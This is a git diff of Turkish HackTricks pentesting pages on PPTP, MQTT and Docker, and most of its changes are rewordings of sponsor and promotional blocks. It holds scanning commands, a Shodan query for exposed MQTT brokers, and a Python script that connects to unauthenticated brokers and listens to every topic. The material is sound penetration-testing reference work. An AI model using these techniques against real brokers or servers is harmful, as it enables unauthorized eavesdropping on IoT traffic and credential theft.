* **Hacking püf noktalarınızı paylaşarak PR'lar göndererek** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına katkıda bulunun.
|
||||
* **Hacking püf noktalarınızı paylaşarak PR'ler göndererek** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına katkıda bulunun.
|
||||
|
||||
</details>
|
||||
|
||||
## WhiteIntel
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**WhiteIntel**](https://whiteintel.io), şirketin veya müşterilerinin **hırsız kötü amaçlı yazılımlar** tarafından **kompromize edilip edilmediğini** kontrol etmek için **ücretsiz** işlevler sunan bir **dark-web** destekli arama motorudur.
|
||||
[**WhiteIntel**](https://whiteintel.io), şirketin veya müşterilerinin **hırsız kötü amaçlı yazılımlar** tarafından **kompromize edilip edilmediğini** kontrol etmek için **ücretsiz** işlevler sunan **dark-web** destekli bir arama motorudur.
|
||||
|
||||
WhiteIntel'in başlıca amacı, bilgi çalan kötü amaçlı yazılımlardan kaynaklanan hesap ele geçirmeleri ve fidye yazılımı saldırılarıyla mücadele etmektir.
|
||||
WhiteIntel'in başlıca amacı, bilgi çalan kötü amaçlı yazılımlardan kaynaklanan hesap ele geçirmeleri ve fidye saldırılarıyla mücadele etmektir.
|
||||
|
||||
Websitesini ziyaret edebilir ve motorlarını **ücretsiz** deneyebilirsiniz:
|
||||
Websitesini ziyaret edebilir ve **ücretsiz** olarak motorlarını deneyebilirsiniz:
|
||||
|
||||
{% embed url="https://whiteintel.io" %}
|
||||
|
||||
|
@ -30,7 +30,7 @@ Websitesini ziyaret edebilir ve motorlarını **ücretsiz** deneyebilirsiniz:
|
|||
|
||||
## Temel Bilgiler
|
||||
|
||||
**Noktadan Noktaya Tünel Protokolü (PPTP)**, mobil cihazlara **uzaktan erişim** için yaygın olarak kullanılan bir yöntemdir. Anahtarların değiş tokuşu için **TCP port 1723**'ü kullanırken, veriler arasında iletilen **IP protokolü 47** (Generic Routing Encapsulation veya **GRE**), verilerin şifrelenmesi için kullanılır. Bu kurulum, internet üzerinden güvenli bir iletişim kanalı kurmak için hayati öneme sahiptir, böylece değiş tokuş edilen verilerin gizli kalmasını ve yetkisiz erişimden korunmasını sağlar.
|
||||
**Noktadan Noktaya Tünel Protokolü (PPTP)**, mobil cihazlara **uzaktan erişim** için yaygın olarak kullanılan bir yöntemdir. Anahtarların değiş tokuşu için **TCP port 1723**'ü kullanırken, verilerin şifrelenmesi için **IP protokolü 47** (Generic Routing Encapsulation veya **GRE**) kullanılır ve bu, eşler arasında iletilen verilerin gizli kalmasını ve yetkisiz erişimden korunmasını sağlar.
|
||||
|
||||
**Varsayılan Port**:1723
|
||||
|
||||
|
@ -46,14 +46,14 @@ nmap –Pn -sSV -p1723 <IP>
|
|||
|
||||
<details>
|
||||
|
||||
<summary><strong>AWS hackleme konusunda sıfırdan kahramana dönüşün</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong> ile!</strong></summary>
|
||||
<summary><strong>Sıfırdan kahraman olmak için AWS hackleme öğrenin</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
HackTricks'ı desteklemenin diğer yolları:
|
||||
|
||||
* **Şirketinizi HackTricks'te reklamını görmek istiyorsanız** veya **HackTricks'i PDF olarak indirmek istiyorsanız** [**ABONELİK PLANLARI**](https://github.com/sponsors/carlospolop)'na göz atın!
|
||||
* **Şirketinizi HackTricks'te reklamını görmek istiyorsanız** veya **HackTricks'i PDF olarak indirmek istiyorsanız** [**ABONELİK PLANLARI**]'na göz atın (https://github.com/sponsors/carlospolop)!
|
||||
* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
|
||||
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) koleksiyonumuzu keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) ile
|
||||
* **💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) katılın veya bizi **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)'da takip edin.**
|
||||
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) koleksiyonumuzu keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family)
|
||||
* **Katılın** 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) veya bizi **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)** takip edin.**
|
||||
* **Hacking püf noktalarınızı paylaşarak PR'lar göndererek** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına katkıda bulunun.
|
||||
|
||||
</details>
|
||||
|
|
|
@ -2,27 +2,27 @@
|
|||
|
||||
<details>
|
||||
|
||||
<summary><strong>AWS hacklemeyi sıfırdan kahramana öğrenin</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong> ile!</strong></summary>
|
||||
<summary><strong>Sıfırdan kahraman olmaya kadar AWS hackleme öğrenin</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong> ile!</strong></summary>
|
||||
|
||||
HackTricks'ı desteklemenin diğer yolları:
|
||||
|
||||
- **Şirketinizi HackTricks'te reklamınızı görmek istiyorsanız** veya **HackTricks'i PDF olarak indirmek istiyorsanız** [**ABONELİK PLANLARI**]'na göz atın (https://github.com/sponsors/carlospolop)!
|
||||
- [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
|
||||
- [**The PEASS Family**](https://opensea.io/collection/the-peass-family)'yi keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuz
|
||||
- **Katılın** 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) veya bizi **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)'da **takip edin**.
|
||||
- **Hacking püf noktalarınızı paylaşarak PR'lar göndererek** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına katkıda bulunun.
|
||||
* **Şirketinizi HackTricks'te reklamını görmek istiyorsanız** veya **HackTricks'i PDF olarak indirmek istiyorsanız** [**ABONELİK PLANLARI**](https://github.com/sponsors/carlospolop)'na göz atın!
|
||||
* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
|
||||
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)'yi keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuz
|
||||
* **Katılın** 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) veya bizi **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)'da **takip edin**.
|
||||
* **Hacking püf noktalarınızı paylaşarak PR'lar göndererek** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına katkıda bulunun.
|
||||
|
||||
</details>
|
||||
|
||||
## WhiteIntel
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**WhiteIntel**](https://whiteintel.io), **karanlık web** destekli bir arama motorudur ve şirketin veya müşterilerinin **hırsız kötü amaçlı yazılımlar** tarafından **kompromize edilip edilmediğini** kontrol etmek için **ücretsiz** işlevsellikler sunar.
|
||||
[**WhiteIntel**](https://whiteintel.io), bir şirketin veya müşterilerinin **hırsız kötü amaçlı yazılımlar** tarafından **kompromize edilip edilmediğini** kontrol etmek için **ücretsiz** işlevler sunan bir **dark-web** destekli arama motorudur.
|
||||
|
||||
WhiteIntel'in başlıca amacı, bilgi çalan kötü amaçlı yazılımlardan kaynaklanan hesap ele geçirmeleri ve fidye yazılımı saldırılarıyla mücadele etmektir.
|
||||
WhiteIntel'in başlıca amacı, bilgi çalan kötü amaçlı yazılımlardan kaynaklanan hesap ele geçirmeleri ve fidye saldırılarıyla mücadele etmektir.
|
||||
|
||||
Websitesini ziyaret edebilir ve motorlarını **ücretsiz** deneyebilirsiniz:
|
||||
Websitesini ziyaret edebilir ve **ücretsiz** olarak motorlarını deneyebilirsiniz:
|
||||
|
||||
{% embed url="https://whiteintel.io" %}
|
||||
|
||||
|
@ -30,7 +30,7 @@ Websitesini ziyaret edebilir ve motorlarını **ücretsiz** deneyebilirsiniz:
|
|||
|
||||
## Temel Bilgiler
|
||||
|
||||
**MQ Telemetri Taşıma Protokolü (MQTT)**, aşırı basitlik ve hafifliği ile öne çıkan bir **yayın/abone mesajlaşma protokolü** olarak bilinir. Bu protokol, cihazların sınırlı yeteneklere sahip olduğu ve düşük bant genişliği, yüksek gecikme süresi veya güvenilmez bağlantılarla karakterize edilen ağlar üzerinde çalıştığı ortamlar için özel olarak tasarlanmıştır. MQTT'nin temel amaçları arasında ağ bant genişliğinin kullanımını en aza indirgeme ve cihaz kaynaklarına olan talebi azaltma yer alır. Ayrıca, güvenilir iletişimi sürdürmeyi ve belirli bir teslimat güvencesi düzeyi sağlamayı amaçlar. Bu hedefler, MQTT'yi **makine-makine (M2M) iletişimi** ve **Nesnelerin İnterneti (IoT)** alanı için son derece uygun hale getirir, burada birçok cihazın verimli bir şekilde bağlanması esastır. Ayrıca, MQTT, bant genişliğini ve pil ömrünü korumanın önemli olduğu mobil uygulamalar için son derece faydalıdır.
|
||||
**MQ Telemetry Transport (MQTT)**, aşırı basitlik ve hafifliği ile öne çıkan bir **yayın/abone mesajlaşma protokolü** olarak bilinir. Bu protokol özellikle, cihazların sınırlı yeteneklere sahip olduğu ve düşük bant genişliği, yüksek gecikme veya güvenilmez bağlantılarla karakterize edilen ağlar üzerinde çalıştığı ortamlar için özel olarak tasarlanmıştır. MQTT'nin temel hedefleri arasında ağ bant genişliğinin kullanımını en aza indirgeme ve cihaz kaynaklarına olan talebi azaltma yer alır. Ayrıca, güvenilir iletişimi sürdürmeyi ve belirli bir teslimat güvencesi sağlamayı amaçlar. Bu hedefler, MQTT'yi **makine-makine (M2M) iletişimi** ve **Nesnelerin İnterneti (IoT)** alanı için son derece uygun hale getirir, burada birçok cihazın verimli bir şekilde bağlanması esastır. Ayrıca, MQTT, bant genişliğini ve pil ömrünü korumanın önemli olduğu mobil uygulamalar için son derece faydalıdır.
|
||||
|
||||
**Varsayılan port:** 1883
|
||||
```
|
||||
|
@ -39,7 +39,7 @@ PORT STATE SERVICE REASON
|
|||
```
|
||||
## Trafik İncelenmesi
|
||||
|
||||
MQTT brokerları tarafından bir **CONNECT** paketi alındığında, bir **CONNACK** paketi geri gönderilir. Bu paket, bağlantı durumunu anlamak için hayati öneme sahip olan bir dönüş kodunu içerir. **0x00** dönüş kodu, kimlik bilgilerinin kabul edildiğini ve başarılı bir bağlantıyı gösterir. Öte yandan, **0x05** dönüş kodu, kimlik bilgilerinin geçersiz olduğunu belirterek bağlantıyı engeller.
|
||||
MQTT brokerları tarafından bir **CONNECT** paketi alındığında, bir **CONNACK** paketi geri gönderilir. Bu paket, bağlantı durumunu anlamak için önemli olan bir dönüş kodu içerir. **0x00** dönüş kodu, kimlik bilgilerinin kabul edildiğini ve başarılı bir bağlantıyı gösterir. Öte yandan, **0x05** dönüş kodu, kimlik bilgilerinin geçersiz olduğunu belirterek bağlantıyı engeller.
|
||||
|
||||
Örneğin, broker, geçersiz kimlik bilgileri nedeniyle bağlantıyı reddederse, senaryo şöyle görünecektir:
|
||||
```
|
||||
|
@ -54,9 +54,9 @@ MQTT brokerları tarafından bir **CONNECT** paketi alındığında, bir **CONNA
|
|||
|
||||
## MQTT Pentesting
|
||||
|
||||
**Kimlik doğrulama tamamen isteğe bağlıdır** ve hatta kimlik doğrulaması yapılıyorsa bile, **varsayılan olarak şifreleme kullanılmaz** (kimlik bilgileri düz metin olarak gönderilir). MITM saldırıları hala gerçekleştirilerek şifreler çalınabilir.
|
||||
**Kimlik doğrulama tamamen isteğe bağlıdır** ve kimlik doğrulaması yapılsa bile, **varsayılan olarak şifreleme kullanılmaz** (kimlik bilgileri düz metin olarak gönderilir). MITM saldırıları hala gerçekleştirilerek şifreler çalınabilir.
|
||||
|
||||
MQTT hizmetine bağlanmak için şunu kullanabilirsiniz: [https://github.com/bapowell/python-mqtt-client-shell](https://github.com/bapowell/python-mqtt-client-shell) ve kendinizi tüm konulara abone yapabilirsiniz:
|
||||
MQTT hizmetine bağlanmak için şu adımları kullanabilirsiniz: [https://github.com/bapowell/python-mqtt-client-shell](https://github.com/bapowell/python-mqtt-client-shell) ve tüm konulara kendinizi abone yapabilirsiniz:
|
||||
```
|
||||
> connect (NOTICE that you need to indicate before this the params of the connection, by default 127.0.0.1:1883)
|
||||
> subscribe "#" 1
|
||||
|
@ -68,7 +68,7 @@ apt-get install mosquitto mosquitto-clients
|
|||
mosquitto_sub -t 'test/topic' -v #Subscribe to 'test/topic'
|
||||
mosquitto_sub -h <host-ip> -t "#" -v #Subscribe to ALL topics.
|
||||
```
|
||||
Ya da bu kodu çalıştırabilirsiniz **kimlik doğrulaması olmadan bir MQTT servisine bağlanmayı denemek, her konuya abone olmak ve onları dinlemek için**:
|
||||
Ya da **bu kodu çalıştırarak kimlik doğrulaması olmadan bir MQTT servisine bağlanmayı deneyebilir, her konuya abone olabilir ve onları dinleyebilirsiniz**:
|
||||
```python
|
||||
#This is a modified version of https://github.com/Warflop/IOT-MQTT-Exploit/blob/master/mqtt.py
|
||||
import paho.mqtt.client as mqtt
|
||||
|
@ -105,10 +105,10 @@ buradan: [https://morphuslabs.com/hacking-the-iot-with-mqtt-8edaf0d07b9b](https:
|
|||
|
||||
Yayın/abone olma modeli şunlardan oluşur:
|
||||
|
||||
- **Yayıncı**: bir mesajı broker'daki bir veya birden fazla konuya yayınlar.
|
||||
- **Abone**: broker'daki bir veya birden fazla konuya abone olur ve yayıncıdan gönderilen tüm mesajları alır.
|
||||
- **Yayıncı**: mesajı broker'daki bir (veya birçok) konuya yayınlar.
|
||||
- **Abone**: broker'daki bir (veya birçok) konuya abone olur ve yayıncıdan gönderilen tüm mesajları alır.
|
||||
- **Broker**: yayıncılardan gelen tüm mesajları abonelere yönlendirir.
|
||||
- **Konu**: bir veya daha fazla seviyeden oluşur ve bir ileri eğik çizgi ile ayrılır (örneğin, /akıllıev/salon/sıcaklık).
|
||||
- **Konu**: bir veya daha fazla seviyeden oluşur ve bir ileri eğik çizgi ile ayrılır (örneğin, /smartshouse/livingroom/temperature).
|
||||
|
||||
### Paket Formatı <a href="#f15a" id="f15a"></a>
|
||||
|
||||
|
@ -118,13 +118,13 @@ Her MQTT paketi sabit bir başlık içerir (Şekil 02). Şekil 02: Sabit Başlı
|
|||
|
||||
### Paket Türleri
|
||||
|
||||
- CONNECT (1): Sunucuya bağlantı istemek için istemci tarafından başlatılır.
|
||||
- CONNECT (1): Sunucuya bağlantı isteğinde bulunmak için istemci tarafından başlatılır.
|
||||
- CONNACK (2): Başarılı bir bağlantının sunucu tarafından onaylanması.
|
||||
- PUBLISH (3): Bir mesajı istemciden sunucuya veya tersine göndermek için kullanılır.
|
||||
- PUBLISH (3): İstemciden sunucuya veya tersine bir mesaj göndermek için kullanılır.
|
||||
- PUBACK (4): Bir PUBLISH paketinin onaylanması.
|
||||
- PUBREC (5): Mesajın alındığından emin olmak için bir iletişim teslimat protokolünün parçası.
|
||||
- PUBREL (6): Mesaj teslimatında daha fazla güvence sağlayarak bir mesajın serbest bırakılmasını gösterir.
|
||||
- PUBCOMP (7): Tamamlanmayı gösteren mesaj teslimat protokolünün final kısmı.
|
||||
- PUBREC (5): Mesajın alındığından emin olmak için bir iletişim protokolünün parçası.
|
||||
- PUBREL (6): Mesaj teslimatında daha fazla güvence sağlayarak bir mesajın serbest bırakılmasını belirtir.
|
||||
- PUBCOMP (7): Tamamlanmayı belirten mesaj teslimatı protokolünün final kısmı.
|
||||
- SUBSCRIBE (8): Bir istemcinin bir konudan gelen mesajları dinlemek için isteği.
|
||||
- SUBACK (9): SUBSCRIBE isteğinin sunucu tarafından onaylanması.
|
||||
- UNSUBSCRIBE (10): Bir istemcinin bir konudan gelen mesajları almaya son vermek için isteği.
|
||||
|
@ -132,19 +132,19 @@ Her MQTT paketi sabit bir başlık içerir (Şekil 02). Şekil 02: Sabit Başlı
|
|||
- PINGREQ (12): İstemci tarafından gönderilen bir kalp atışı mesajı.
|
||||
- PINGRESP (13): Kalp atışı mesajına sunucunun yanıtı.
|
||||
- DISCONNECT (14): Bağlantıyı sonlandırmak için istemci tarafından başlatılır.
|
||||
- 0 ve 15 olarak iki değer, ayrılmış olarak işaretlenmiş ve kullanımları yasaktır.
|
||||
- 0 ve 15 olarak işaretlenen iki değer yasaklanmıştır ve kullanılmamalıdır.
|
||||
|
||||
## Shodan
|
||||
|
||||
- `port:1883 MQTT`
|
||||
|
||||
## WhiteIntel
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**WhiteIntel**](https://whiteintel.io), bir şirketin veya müşterilerinin **hırsız kötü amaçlı yazılımlar** tarafından **kompromize edilip edilmediğini** kontrol etmek için **ücretsiz** işlevsellikler sunan **karanlık web** destekli bir arama motorudur.
|
||||
[**WhiteIntel**](https://whiteintel.io), şirketin veya müşterilerinin **hırsız kötü amaçlı yazılımlar** tarafından **kompromize edilip edilmediğini** kontrol etmek için **ücretsiz** işlevsellikler sunan **dark-web** destekli bir arama motorudur.
|
||||
|
||||
WhiteIntel'in başlıca amacı, bilgi çalan kötü amaçlı yazılımlardan kaynaklanan hesap ele geçirmeleri ve fidye yazılımı saldırılarıyla mücadele etmektir.
|
||||
WhiteIntel'in asıl amacı, bilgi çalan kötü amaçlı yazılımlardan kaynaklanan hesap ele geçirmeleri ve fidye saldırılarıyla mücadele etmektir.
|
||||
|
||||
Websitesini ziyaret edebilir ve **ücretsiz** olarak motorlarını deneyebilirsiniz:
|
||||
|
||||
|
@ -156,10 +156,10 @@ Websitesini ziyaret edebilir ve **ücretsiz** olarak motorlarını deneyebilirsi
|
|||
|
||||
HackTricks'ı desteklemenin diğer yolları:
|
||||
|
||||
- **Şirketinizi HackTricks'te reklamını görmek istiyorsanız** veya **HackTricks'i PDF olarak indirmek istiyorsanız** [**ABONELİK PLANLARINI**](https://github.com/sponsors/carlospolop) kontrol edin!
|
||||
- [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
|
||||
- [**The PEASS Family'yi**](https://opensea.io/collection/the-peass-family) keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuz
|
||||
- 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) **katılın** veya **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**'u takip edin**.
|
||||
- **Hacking püf noktalarınızı göndererek HackTricks ve HackTricks Cloud github depolarına PR'lar göndererek paylaşın**.
|
||||
- **Şirketinizi HackTricks'te reklamını görmek istiyorsanız** veya **HackTricks'i PDF olarak indirmek istiyorsanız** [**ABONELİK PLANLARI**](https://github.com/sponsors/carlospolop)'na göz atın!
|
||||
- [**Resmi PEASS & HackTricks ürünlerini alın**](https://peass.creator-spring.com)
|
||||
- [**The PEASS Family'yi keşfedin**](https://opensea.io/collection/the-peass-family), özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuzu keşfedin
|
||||
- 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) katılın veya bizi Twitter'da 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)** takip edin.**
|
||||
- **Hacking püf noktalarınızı göndererek HackTricks ve HackTricks Cloud github depolarına PR göndererek paylaşın.**
|
||||
|
||||
</details>
|
||||
|
|
|
@ -2,11 +2,11 @@
|
|||
|
||||
<details>
|
||||
|
||||
<summary><strong>AWS hacklemeyi sıfırdan kahramana öğrenin</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Kırmızı Takım Uzmanı)</strong></a><strong> ile!</strong></summary>
|
||||
<summary><strong>AWS hacklemeyi sıfırdan kahramana öğrenin</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong> ile!</strong></summary>
|
||||
|
||||
HackTricks'ı desteklemenin diğer yolları:
|
||||
|
||||
* **Şirketinizi HackTricks'te reklamını görmek istiyorsanız** veya **HackTricks'i PDF olarak indirmek istiyorsanız** [**ABONELİK PLANLARI**](https://github.com/sponsors/carlospolop)'na göz atın!
|
||||
* **Şirketinizi HackTricks'te reklamınızı görmek istiyorsanız** veya **HackTricks'i PDF olarak indirmek istiyorsanız** [**ABONELİK PLANLARI**](https://github.com/sponsors/carlospolop)'na göz atın!
|
||||
* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
|
||||
* [**PEASS Ailesi'ni**](https://opensea.io/collection/the-peass-family) keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuz
|
||||
* **💬 [Discord grubuna](https://discord.gg/hRep4RUj7f) katılın veya [telegram grubuna](https://t.me/peass) katılın veya bizi Twitter'da** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)** takip edin.**
|
||||
|
@ -14,13 +14,13 @@ HackTricks'ı desteklemenin diğer yolları:
|
|||
|
||||
</details>
|
||||
|
||||
## WhiteIntel
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**WhiteIntel**](https://whiteintel.io), **karanlık web** destekli bir arama motorudur ve şirketin veya müşterilerinin **hırsız kötü amaçlı yazılımlar** tarafından **kompromize edilip edilmediğini** kontrol etmek için **ücretsiz** işlevler sunar.
|
||||
[**WhiteIntel**](https://whiteintel.io) **karanlık ağ** destekli bir arama motorudur ve şirketin veya müşterilerinin **hırsız kötü amaçlı yazılımlar** tarafından **kompromize edilip edilmediğini** kontrol etmek için **ücretsiz** işlevsellikler sunar.
|
||||
|
||||
WhiteIntel'in başlıca amacı, bilgi çalan kötü amaçlı yazılımlardan kaynaklanan hesap ele geçirmeleri ve fidye saldırılarıyla mücadele etmektir.
|
||||
WhiteIntel'in başlıca amacı, bilgi çalan kötü amaçlı yazılımlardan kaynaklanan hesap ele geçirmeleri ve fidye yazılımı saldırılarıyla mücadele etmektir.
|
||||
|
||||
Websitesini ziyaret edebilir ve motorlarını **ücretsiz** deneyebilirsiniz:
|
||||
|
||||
|
@ -32,15 +32,15 @@ Websitesini ziyaret edebilir ve motorlarını **ücretsiz** deneyebilirsiniz:
|
|||
|
||||
#### Nedir
|
||||
|
||||
Docker, **konteynerleştirme endüstrisindeki öncü platformdur** ve **sürekli yenilikleri** öncülük eder. Uygulamaların **gelenekselden geleceğe kadar uzanan** kolayca oluşturulmasını ve dağıtılmasını sağlar ve bunların **çeşitli ortamlarda güvenli bir şekilde dağıtılmasını** garanti eder.
|
||||
Docker, **konteynerleştirme endüstrisindeki öncü platformdur** ve **sürekli yenilikleri öncülük eder**. Gelenekselden geleceğe uzanan uygulamaların **kolayca oluşturulmasını ve dağıtılmasını** sağlar ve bunların **çeşitli ortamlarda güvenli bir şekilde dağıtılmasını** garanti eder.
|
||||
|
||||
#### Temel docker mimarisi
|
||||
|
||||
* [**containerd**](http://containerd.io): Bu, konteynerlerin kapsamlı **yaşam döngüsünü yöneten** temel bir çalışma zamanıdır. Bu, **görüntü transferi ve depolama**nın yanı sıra konteynerlerin **yürütülmesi, izlenmesi ve ağlanması**nı da içerir. **containerd** hakkında **daha detaylı bilgiler** sunulmaktadır.
|
||||
* [**containerd**](http://containerd.io): Bu, konteynerlerin **yaşam döngüsünün kapsamlı yönetiminden** sorumlu olan **temel çalışma zamanıdır**. Bu, konteynerlerin **görüntü transferi ve depolanması**nı ele almanın yanı sıra konteynerlerin **yürütülmesi, izlenmesi ve ağlanması**nı denetlemeyi içerir. **containerd** hakkında **daha detaylı bilgiler** sunulmaktadır.
|
||||
* **Container-shim**, **başsız konteynerlerin** işlenmesinde **aracı** olarak kritik bir rol oynar ve konteynerler başlatıldıktan sonra **runc**'ın yerini alır.
|
||||
* [**runc**](http://runc.io): Hafif ve evrensel konteyner çalışma zamanı yetenekleriyle saygı gören runc, **OCI standardı** ile uyumludur. **OCI kılavuzlarına** göre konteynerleri **başlatmak ve yönetmek** için containerd tarafından kullanılır ve orijinal **libcontainer**'dan evrim geçirmiştir.
|
||||
* [**runc**](http://runc.io): Hafif ve evrensel konteyner çalışma zamanı yetenekleriyle saygı gören runc, **OCI standardı** ile uyumlu hale getirilmiştir. containerd tarafından **OCI yönergelerine göre konteynerleri başlatmak ve yönetmek** için kullanılır ve orijinal **libcontainer**'dan evrim geçirmiştir.
|
||||
* [**grpc**](http://www.grpc.io), containerd ve **docker-engine** arasındaki iletişimi **kolaylaştırmak** için esastır ve **verimli etkileşimi** sağlar.
|
||||
* [**OCI**](https://www.opencontainers.org), en son Docker sürümlerinin hem **OCI görüntüsü** hem de **çalışma zamanı** standartlarına **uyumlu** olduğunu korumak için önemlidir.
|
||||
* [**OCI**](https://www.opencontainers.org), en son Docker sürümlerinin hem **OCI görüntüsü** hem de **çalışma zamanı** standartlarına **uyumlu** olduğunu korumak için önemlidir.
|
||||
|
||||
#### Temel komutlar
|
||||
```bash
|
||||
|
@ -67,11 +67,11 @@ docker system prune -a
|
|||
```
|
||||
#### Containerd
|
||||
|
||||
**Containerd**, özellikle **Docker ve Kubernetes** gibi konteyner platformlarının ihtiyaçlarını karşılamak üzere geliştirilmiştir. Linux, Windows, Solaris ve daha fazlası gibi çeşitli işletim sistemlerinde konteynerlerin yürütülmesini **basitleştirmeyi amaçlar**, işletim sistemine özgü işlevselliği ve sistem çağrılarını soyutlayarak. Containerd'ın amacı, kullanıcıları tarafından gereken temel özellikleri içermektir ve gereksiz bileşenleri atlamaya çalışır. Ancak, bu hedefin tamamen gerçekleştirilmesinin zor olduğu kabul edilmektedir.
|
||||
**Containerd**, özellikle **Docker ve Kubernetes** gibi konteyner platformlarının ihtiyaçlarını karşılamak üzere geliştirilmiştir. Linux, Windows, Solaris ve daha fazlası gibi çeşitli işletim sistemlerinde konteynerlerin yürütülmesini **basitleştirmeyi amaçlar**, işletim sistemine özgü işlevselliği ve sistem çağrılarını soyutlayarak. Containerd'ın amacı, kullanıcılarının gereksinim duyduğu temel özellikleri içermek ve gereksiz bileşenleri atlamaya çalışmaktır. Ancak, bu hedefi tamamen gerçekleştirmek zorlu olarak kabul edilmektedir.
|
||||
|
||||
Bir ana tasarım kararı, **Containerd'ın ağ işlemlerini ele almamasıdır**. Ağ, dağıtılmış sistemlerde kritik bir unsurdur ve Yazılım Tanımlı Ağ (SDN) ve hizmet keşfi gibi karmaşıklıklar, bir platformdan diğerine önemli ölçüde değişmektedir. Bu nedenle, Containerd, desteklediği platformlar tarafından yönetilen ağ yönlerini bırakır.
|
||||
Bir ana tasarım kararı, **Containerd'ın ağ işlemlerini ele almamasıdır**. Ağ, dağıtılmış sistemlerde önemli bir unsurdur ve Yazılım Tanımlı Ağ (SDN) ve hizmet keşfi gibi karmaşıklıklar, platformdan platforma büyük ölçüde değişmektedir. Bu nedenle, Containerd ağla ilgili yönleri, desteklediği platformlar tarafından yönetilmesine bırakır.
|
||||
|
||||
**Docker, konteynerleri çalıştırmak için Containerd'ı kullanırken**, Containerd'ın yalnızca Docker'ın işlevlerinin bir alt kümesini desteklediği önemlidir. Özellikle, Containerd, Docker'da bulunan ağ yönetimi yeteneklerine sahip değildir ve Docker sürümlerinin doğrudan oluşturulmasını desteklemez. Bu ayrım, Containerd'ın odaklı rolünü vurgular; konteyner çalışma zamanı ortamı olarak, daha özelleşmiş işlevleri entegre olduğu platformlara devreder.
|
||||
**Docker, Containerd'ı** konteynerleri çalıştırmak için kullansa da, Containerd'ın yalnızca Docker'ın işlevlerinin bir alt kümesini desteklediği önemlidir. Özellikle, Containerd, Docker'da bulunan ağ yönetimi yeteneklerine sahip değildir ve Docker sürümlerinin doğrudan oluşturulmasını desteklemez. Bu ayrım, Containerd'ın odaklı rolünü vurgular; konteyner çalışma zamanı ortamı olarak, daha özelleşmiş işlevleri entegre olduğu platformlara devreder.
|
||||
```bash
|
||||
#Containerd CLI
|
||||
ctr images pull --skip-verify --plain-http registry:5000/alpine:latest #Get image
|
||||
|
